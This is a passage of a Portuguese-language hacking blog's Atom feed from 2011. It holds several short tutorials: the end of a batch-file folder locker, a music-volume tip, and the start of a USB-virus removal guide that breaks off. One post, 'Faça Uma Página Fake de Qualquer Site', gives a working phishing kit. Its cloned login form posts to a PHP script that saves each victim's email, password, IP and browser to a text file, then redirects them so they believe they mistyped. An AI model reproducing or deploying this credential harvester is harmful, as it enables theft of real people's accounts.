&lt;div style="display: block; height: auto; overflow-x: hidden; overflow-y: hidden; width: inherit;"&gt;&lt;div class="syntaxhighlighter " id="highlighter_60319" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: rgb(231, 229, 220) !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 1em !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 1em !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 1px !important; padding-left: 1px !important; padding-right: 1px !important; padding-top: 1px !important; position: relative !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: 728px;"&gt;&lt;div class="lines" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;div class="line alt1" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;code class="number" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; color: rgb(92, 92, 92) !important; display: block !important; float: left !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0.3em !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: right !important; top: auto !important; vertical-align: baseline !important; width: 3em !important;"&gt;1.&lt;/code&gt;&lt;span class="content" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: rgb(255, 255, 255) !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-color: rgb(108, 226, 108) !important; border-left-style: solid !important; border-left-width: 3px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; color: rgb(0, 0, 0) !important; display: block !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 3.3em !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0.5em !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;span class="block" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: url(http://www.tudosobrehacker.com/plugins/content/codecitation/styles/wrapping.png) !important; background-position: 0px 1.1em !important; background-repeat: no-repeat !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; display: block !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 1.5em !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; text-indent: -1.5em !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;code class="plain" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; color: rgb(0, 0, 0) !important; display: inline !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;if NOT %pass%== senha goto FAIL&lt;/code&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
ta, agora vai la em Salvar Como e salva com locker.bat&lt;br /&gt;
ok.. voltando pra pasta onde foi salvo o arquivo bat&lt;br /&gt;
abra o arquivo 'locker.bat' e irá aparecer uma pasta chamada 'Private'&lt;br /&gt;
essa será a pasta q ficará escondida e só será aberta com a senha q vc escolheu.&lt;br /&gt;
dpois d ter criado a pasta 'Private', clique novamente sobre o arquivo&lt;br /&gt;
'locker.bat' e irá aparecer a janelinha do Dos .. a seguinte pergunta será feita:&lt;br /&gt;
&lt;strong&gt;Are you sure you want to lock the folder(Y/N)&lt;/strong&gt;&lt;br /&gt;
digite&amp;nbsp;&lt;strong&gt;Y&lt;/strong&gt;&amp;nbsp;e dê enter.&lt;br /&gt;
repare agora q a pasta 'Private' desapareceu...&lt;br /&gt;
ela está agora oculta e só será aberta qndo clicar novamente no arquivo&lt;br /&gt;
'locker.bat', pois aí será solicitada a senha, com a seguinte frase:&lt;br /&gt;
&lt;strong&gt;Enter password to unlock folder&lt;/strong&gt;&lt;br /&gt;
aí vc digita a senha e pronto aparece a pasta.&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Para evitar que os outros descubram a sua senha atraves do Bat converta-o usando um programa chamado Bat to Exe Converter&lt;/div&gt;&lt;/em&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5358464197839652771-8202075602934230153?l=headplay.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/eC32QhlCShll0yczC08PrHQr4oA/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/eC32QhlCShll0yczC08PrHQr4oA/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/eC32QhlCShll0yczC08PrHQr4oA/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/eC32QhlCShll0yczC08PrHQr4oA/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/blogspot/fYGk/~4/WDLgAITyRKM" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://headplay.blogspot.com/feeds/8202075602934230153/comments/default" title="Postar comentários" /><link rel="replies" type="text/html" href="http://headplay.blogspot.com/2011/03/trancando-pasta-com-senha.html#comment-form" title="0 Comentários" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/5358464197839652771/posts/default/8202075602934230153?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/5358464197839652771/posts/default/8202075602934230153?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/blogspot/fYGk/~3/WDLgAITyRKM/trancando-pasta-com-senha.html" title="Trancando Pasta com Senha ." /><author><name>HeadPlay</name><uri>http://www.blogger.com/profile/01894610097837927562</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="31" height="21" src="http://2.bp.blogspot.com/-q0v3_I2taVA/TYoGfl7v2YI/AAAAAAAAALY/aHemSYz8Fnw/s220/hacker.jpg" /></author><thr:total>0</thr:total><feedburner:origLink>http://headplay.blogspot.com/2011/03/trancando-pasta-com-senha.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CEEAQnY6cSp7ImA9WhZTGUo.&quot;"><id>tag:blogger.com,1999:blog-5358464197839652771.post-747132921199250046</id><published>2011-03-23T06:36:00.001-07:00</published><updated>2011-03-24T06:17:23.819-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-03-24T06:17:23.819-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="." /><category scheme="http://www.blogger.com/atom/ns#" term="*" /><title>Faca Uma Pgina Fake de Qualquer Site .</title><content type="html">&lt;span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; color: #5f5f5f; font-family: Tahoma; font-size: 12px; line-height: 14px;"&gt;A pagina fake como todos sabem é um clone da pagina original, mas só que invés de logar no site, ele envia as informações pra outro arquivo que no caso seria em php e o cara rouba ou sei la o que faz com a conta, mais enfim, vou mostrar como seria:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;html&amp;gt;&lt;br /&gt;
&amp;lt;form action="salva.php" method="POST"&amp;gt;&lt;br /&gt;
Login:&amp;lt;input type="text" name="Email"&amp;gt;&amp;lt;bR&amp;gt;&lt;br /&gt;
Senha:&amp;lt;input type="password" name="Passwd"&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;/form&amp;gt;&lt;br /&gt;
&amp;lt;/html&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Vou explicando por linhas&lt;br /&gt;
&lt;br /&gt;
1. Incia-se o html&lt;br /&gt;
&lt;br /&gt;
2. Abre o form, action serve para enviar as informações para a pagina indicada e method que no caso seria o metodo usado, ali eu uso o metodo POST.&lt;br /&gt;
&lt;br /&gt;
3. Login, ai vem o input que é a caixa de texto e "type" que seria "tipo" é o tipo de coisa que vai aparece na caixa, ali no caso vai aparecer o texto normalmente e o id serve para nomear a informação levada ao "Salva.php".&lt;br /&gt;
&lt;br /&gt;
4. Senha, e a caixa para escrever a senha, ali o "tipo" é password ou seja vai aparecer akelas bolinhas ao envez de texto e ai ali o id é o "Passwd".&lt;br /&gt;
&lt;br /&gt;
5. Fecha o form ou seja, qualquer input abaixo naum vai ser mais enviado para o salva.php, só se vc criar outro form.&lt;br /&gt;
&lt;br /&gt;
6. Fecha o html.&lt;br /&gt;
&lt;br /&gt;
7. Agora crie um arquivo PHP com este codigo:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;?php&lt;br /&gt;
$nomearquivo ="senhas.txt";&lt;br /&gt;
$email =$_POST["Email"];&lt;br /&gt;
$senha =$_POST["Passwd"];&lt;br /&gt;
$browser =$_SERVER['HTTP_USER_AGENT'];&lt;br /&gt;
$ip =$_SERVER['REMOTE_ADDR'];&lt;br /&gt;
$hostname =gethostbyaddr($ip);&lt;br /&gt;
$data =date("Y-m-d");&lt;br /&gt;
$hora =date("H:i:s");&lt;br /&gt;
$traco ="&amp;lt;br&amp;gt;__________________________________________________________________&amp;lt;br&amp;gt;";&lt;br /&gt;
$ess ="Email: ".$email."&amp;lt;br&amp;gt;Senha: ".$senha."&amp;lt;br&amp;gt;Navegador: ".$browser."&amp;lt;br&amp;gt;IP: ".$ip."&amp;lt;br&amp;gt;Nome do Host: ".$hostname."&amp;lt;br&amp;gt;Data: ".$data."&amp;lt;br&amp;gt;Hora: ".$hora."&amp;lt;br&amp;gt;".$traco;&lt;br /&gt;
$abre = @fopen("senhas.txt","a+");&lt;br /&gt;
$escreve = fwrite($abre, $ess);&lt;br /&gt;
echo "&amp;lt;script&amp;gt;javascript:document.location='www.google.com.br'&amp;lt;/script&amp;gt;";&lt;br /&gt;
?&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Esse é o Salva.php.&lt;br /&gt;
Vou explicar que neen ontem, por linhas&lt;br /&gt;
1. Se inicia o php&lt;br /&gt;
2. Variavel do nome do arquivo de texto&lt;br /&gt;
3. Variavel Setando valor recebido pelo form que seria da caixa que tinha o name="Email"&lt;br /&gt;
4. Mesmo caso acima, só que agora é recebido pela caixa com o name="Passwd"&lt;br /&gt;
5. Variavel setando o nome do browser que o cara está usando&lt;br /&gt;
6. mesmo caso acima, só que pegando o ip&lt;br /&gt;
7. Esse puxa o nome do host&lt;br /&gt;
8. Setando data na variavel&lt;br /&gt;
9. Setando Horario na variavel&lt;br /&gt;
10. Setando um monte de underline :D&lt;br /&gt;
11. Setando na variavel tudo que vai ser escrito no bloco de notas&lt;br /&gt;
12. Setando o comando fopen dentro da variavel&lt;br /&gt;
13. Executa o Comando fwrite, ali ele escolhe onde vai escrever e como($abre), e depois oq vai escrever($ess)&lt;br /&gt;
14. Executa um javascript, para enviar você para outra pagina, que no caso iriam usar para encaminhar para a pagina original, fazendo com que a vitima pensasse que colocou a senha errada.&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5358464197839652771-747132921199250046?l=headplay.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/Bgiy6vmbbEO1eiq1-B5PhixW130/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/Bgiy6vmbbEO1eiq1-B5PhixW130/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/Bgiy6vmbbEO1eiq1-B5PhixW130/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/Bgiy6vmbbEO1eiq1-B5PhixW130/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/blogspot/fYGk/~4/DXnnplfvTMs" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://headplay.blogspot.com/feeds/747132921199250046/comments/default" title="Postar comentários" /><link rel="replies" type="text/html" href="http://headplay.blogspot.com/2011/03/faca-uma-pgina-fake-de-qualquer-site.html#comment-form" title="0 Comentários" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/5358464197839652771/posts/default/747132921199250046?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/5358464197839652771/posts/default/747132921199250046?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/blogspot/fYGk/~3/DXnnplfvTMs/faca-uma-pgina-fake-de-qualquer-site.html" title="Faca Uma Pgina Fake de Qualquer Site ." /><author><name>HeadPlay</name><uri>http://www.blogger.com/profile/01894610097837927562</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="31" height="21" src="http://2.bp.blogspot.com/-q0v3_I2taVA/TYoGfl7v2YI/AAAAAAAAALY/aHemSYz8Fnw/s220/hacker.jpg" /></author><thr:total>0</thr:total><feedburner:origLink>http://headplay.blogspot.com/2011/03/faca-uma-pgina-fake-de-qualquer-site.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DkADSXc9cSp7ImA9WhZSE0w.&quot;"><id>tag:blogger.com,1999:blog-5358464197839652771.post-446336178705575275</id><published>2011-03-23T06:33:00.000-07:00</published><updated>2011-03-28T05:19:38.969-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-03-28T05:19:38.969-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="*" /><title>Aumentantando Músicas .!</title><content type="html">&lt;span class="Apple-style-span" style="color: #5f5f5f; font-family: Tahoma; font-size: 12px; line-height: 14px;"&gt;&lt;b&gt;Primeiro&lt;/b&gt;&amp;nbsp;: Baixe o programa&amp;nbsp;&lt;a href="http://www.baixaki.com.br/download/mptrim-2-13.htm" style="color: #97a931; font-size: 11px; font-weight: normal; outline-style: none; text-decoration: none;" target="_blank"&gt;mpTrim&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Segundo&lt;/b&gt;&amp;nbsp;: Abra o programa , e clique em open e escolha a música que queira aumentar&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Terceiroo&lt;/b&gt;&amp;nbsp;: Vá em volume control vai estar em '0DB' ponha em +6 ( quanto maior, maior sera o volume)&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Quarto&lt;/b&gt;&amp;nbsp;: Vá em SAVE AS e pronto.&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #5f5f5f; font-family: Tahoma; font-size: small;"&gt;&lt;span class="Apple-style-span" style="font-size: 12px; line-height: 14px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #5f5f5f; font-family: Tahoma; font-size: small;"&gt;&lt;span class="Apple-style-span" style="font-size: 12px; line-height: 14px;"&gt;OBS: &lt;span class="Apple-style-span" style="color: red;"&gt;Cuidado Faça o teste em 1 musica para ver a qualidade. !&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5358464197839652771-446336178705575275?l=headplay.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/E6yfQK1N8DeX2bvKzpFPb_lBqD4/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/E6yfQK1N8DeX2bvKzpFPb_lBqD4/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/E6yfQK1N8DeX2bvKzpFPb_lBqD4/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/E6yfQK1N8DeX2bvKzpFPb_lBqD4/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/blogspot/fYGk/~4/_w3qbhW7Ul4" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://headplay.blogspot.com/feeds/446336178705575275/comments/default" title="Postar comentários" /><link rel="replies" type="text/html" href="http://headplay.blogspot.com/2011/03/primeiro-baixe-o-programa-mptrim.html#comment-form" title="0 Comentários" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/5358464197839652771/posts/default/446336178705575275?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/5358464197839652771/posts/default/446336178705575275?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/blogspot/fYGk/~3/_w3qbhW7Ul4/primeiro-baixe-o-programa-mptrim.html" title="Aumentantando Músicas .!" /><author><name>HeadPlay</name><uri>http://www.blogger.com/profile/01894610097837927562</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="31" height="21" src="http://2.bp.blogspot.com/-q0v3_I2taVA/TYoGfl7v2YI/AAAAAAAAALY/aHemSYz8Fnw/s220/hacker.jpg" /></author><thr:total>0</thr:total><feedburner:origLink>http://headplay.blogspot.com/2011/03/primeiro-baixe-o-programa-mptrim.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CEEAQnY6cSp7ImA9WhZTGUo.&quot;"><id>tag:blogger.com,1999:blog-5358464197839652771.post-2209275887421821368</id><published>2011-03-23T05:59:00.001-07:00</published><updated>2011-03-24T06:17:23.819-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-03-24T06:17:23.819-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="." /><category scheme="http://www.blogger.com/atom/ns#" term="*" /><title>Removendo Virus de Pen Driver</title><content type="html">&lt;span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; color: #5f5f5f; font-family: Tahoma; font-size: 12px; line-height: 14px;"&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Antigamente, cerca de 2 a 3 anos atrás, era muito comum ver as pessoas usando disquetes para carregar seus dados pessoais por ai, afinal era muito mais prático e rápido armazenar um dado em um disquete do que gravar um CD.&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Para quem não se lembra desse artefato, quem sabe uma foto ajude&lt;br /&gt;
&lt;img alt="Disquete" height="95" src="http://juninho.files.wordpress.com/2008/04/disquete.jpg?w=92&amp;amp;h=95" style="border-bottom-style: none; border-color: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial;" title="Disquete" width="92" /&gt;&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Hoje em dia é muito raro ver pessoas usando disquetes, mas por que?&lt;br /&gt;
Com os preços das memórias flash cada vez menores, o preço dos pendrives vem caindo absurdamente.&lt;br /&gt;
A 2 anos atrás um pendrive de 1GB de uma boa marca ultrapassava os R$100,00. Hoje com R$40,00 você compra um com 4GB.&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Mas como tudo que é bom, também tem seu lado ruim e com os pendrives não são diferentes, sempre tem as mentes do mal que pensam em como podem utilizar isso para prejudicar os computadores.&lt;br /&gt;
Quem utiliza o pendrive em vários ambientes, de trabalho, faculdade, escola, casa de amigos, lan houses… Volta e meia acaba se deparando com algum vírus nele.&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Quem tem um antivirus razoavelmente decente pode ficar mais tranquilo ao saber que colocando o pendrive no seu computador o antivírus vai subir a janelinha acusando vírus e limpar seu pendrive.&lt;br /&gt;
O problema está em antivirus não tão bons que não detectam esses vírus, ou quando deletam não excluem junto um arquivo que faz rodar o vírus, e por consequência você não consegue acessar seu pendrive.&lt;br /&gt;
Ou uma situação pior ainda onde o computador não tem antivirus instalados.&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Esses vírus normalmente impendem o acesso ao pendrive ou em casos mais graves chegam até mesmo a danificar seriamente o computador.&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Já vi casos de pessoas que formataram os pendrives em busca da solução. Mas PARE!&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Não é preciso formatar seu pendrive, na verdade é muito fácil resolver o problema. Bom pelo menos era fácil de remover esses vírus e não era necessário nem mesmo de antivirus. Mas como tudo na informática evolui muito rápido, os vírus não são excessão.&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Agora estão circulando nos pendrives vírus mais complexos que impedem de exibir os arquivos ocultos, dificultando muito o trabalho de remover o vírus.&lt;br /&gt;
Mas ainda não é impossível remover essas pragas.&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Vamos a luta…&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;&lt;strong&gt;1º Passo – Como funcionam esses vírus?&lt;/strong&gt;&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Quando inserimos um CD ou DVD no computador ele normalmente executa algum software, ou abre algo. Isso tudo automaticamente.&lt;br /&gt;
Como isso acontece? Existe um arquivo chamado&amp;nbsp;&lt;a href="" style="outline-color: initial; outline-style: none; outline-width: initial;"&gt;autorun.inf&lt;/a&gt;&amp;nbsp;que fica na raiz do CD ou DVD que tem as instruções de abrir algum programa ou colocar o ícone no CD/DVD.&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Esses vírus fazem uso desse arquivo mas ao invés de abrir algo inofencivo executam vírus que ficam instalados no computador e infectam outros pendrives, ou como disse em casos mais extremos danificam o computador.&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;&lt;strong&gt;2º Passo – Usar um bom antivírus&lt;/strong&gt;&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Existem muitos softwares hoje em dia, mas quais são eficientes é outra história.&lt;br /&gt;
Não há um antivírus perfeito, mas há os menos ruins.&lt;br /&gt;
Dentre eles, os nomes que ouço muito bem são.&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;-Os pagos&lt;br /&gt;
&lt;a href="" style="outline-color: initial; outline-style: none; outline-width: initial;"&gt;Kaspersky&lt;/a&gt;&lt;br /&gt;
&lt;a href="" style="outline-color: initial; outline-style: none; outline-width: initial;"&gt;NOD32&lt;/a&gt;&lt;br /&gt;
&lt;a href="" style="outline-color: initial; outline-style: none; outline-width: initial;"&gt;Panda&lt;/a&gt;&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;-Os gratuitos&lt;br /&gt;
